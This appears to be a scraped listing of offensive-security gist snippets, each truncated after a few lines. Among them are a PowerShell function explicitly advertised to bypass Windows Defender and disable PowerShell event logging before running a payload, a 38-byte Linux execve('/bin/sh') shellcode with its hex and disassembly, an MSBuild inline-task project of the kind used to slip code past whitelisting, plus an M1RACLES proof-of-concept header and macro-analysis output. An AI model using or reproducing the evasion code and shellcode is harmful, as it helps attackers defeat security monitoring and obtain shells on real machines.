This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
/* | |
* m1racle-poc: a basic proof of concept for the M1RACLES vulnerability in the Apple M1. | |
* | |
* This program allows you to read and write the state of the s3_5_c15_c10_1 CPU register. | |
* | |
* Please visit m1racles.com for more information. | |
* | |
* Licensed under the MIT license. | |
*/ |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# this script can bypass all AVs features that will stop you from running your juicy-juicy powershell payload REFLECTIVELY | |
# run this script before running your payload,and make sure that its runned on the same session! | |
# DONT COMBINE THIS SCRIPT WITH YOUR PAYLOAD,OTHERWISE IT WILL NOT WORK!!! | |
# you dont need to invoke the function again! | |
function Invoke-OneDoesNotSimplyBypassEntireWinDefender { | |
[ScriptBlock]."GetFiel`d"('signatures','N'+'onPublic,Static').SetValue($null,(New-Object Collections.Generic.HashSet[string])) | |
[Reflection.Assembly]::LoadWithPartialName('System.Core').GetType('System.Diagnostics.Eventing.EventProvider').GetField('m_enabled','NonPublic,Instance').SetValue([Ref].Assembly.GetType('System.Management.Automation.Tracing.PSEtwLogProvider').GetField('etwProvider','NonPublic,Static').GetValue($null),0) | |
$increment = 0 | |
$maxincrement = 30000000 | |
For ($increment=0; $increment -lt $maxincrement;$increment++) { $increment++ } |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
using System; | |
using System.IO; | |
using System.Text; | |
using System.IO.Compression; | |
using System.EnterpriseServices; | |
using System.Collections.Generic; | |
using System.Runtime.InteropServices; | |
using System.Security.Cryptography; | |
/* |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
olevba 0.54.2 on Python 3.7.3 - http://decalage.info/python/oletools | |
=============================================================================== | |
FILE: a8f5b757d2111927731c2c4730ca97a9d4f2c2b6eb9cd80bbb3ff33168bfd740 | |
Type: OpenXML | |
------------------------------------------------------------------------------- | |
VBA MACRO ThisWorkbook.cls | |
in file: xl/vbaProject.bin - OLE stream: 'VBA/ThisWorkbook' | |
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - | |
(empty macro) | |
------------------------------------------------------------------------------- |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#include <windows.h> | |
#include <stdio.h> | |
#include <stdint.h> | |
#pragma comment(lib, "USER32") | |
FARPROC NtUserPostMessage; | |
BOOL CALLBACK QueryWindowMessageProc(HWND Window, LPARAM Param) | |
{ |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
/* | |
* Linux x86(-64) - execve("/bin/sh", ["/bin/sh", 0], 0) shellcode (38 bytes) | |
* 31c050488b1424eb105478065e5fb03b0f05595b40b00bcd80e8ebffffff2f62696e2f736800 | |
* | |
* - offset - bytes 32-bit code 64-bit code | |
* 0x00000000 31c0 xor eax, eax xor eax, eax | |
* 0x00000002 50 push eax push rax | |
* 0x00000003 48 dec eax rex.w | |
* 0x00000004 8b1424 mov edx, dword [esp] mov rdx, qword [rsp] | |
* 0x00000007 eb10 jmp 0x19 jmp 0x19 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003"> | |
<Target Name="NotSubTee"> | |
<BusinessTime /> | |
</Target> | |
<UsingTask | |
TaskName="BusinessTime" | |
TaskFactory="CodeTaskFactory" | |
AssemblyFile="C:\Windows\Microsoft.Net\Framework\v4.0.30319\Microsoft.Build.Tasks.v4.0.dll" > | |
<ParameterGroup/> | |
<Task> |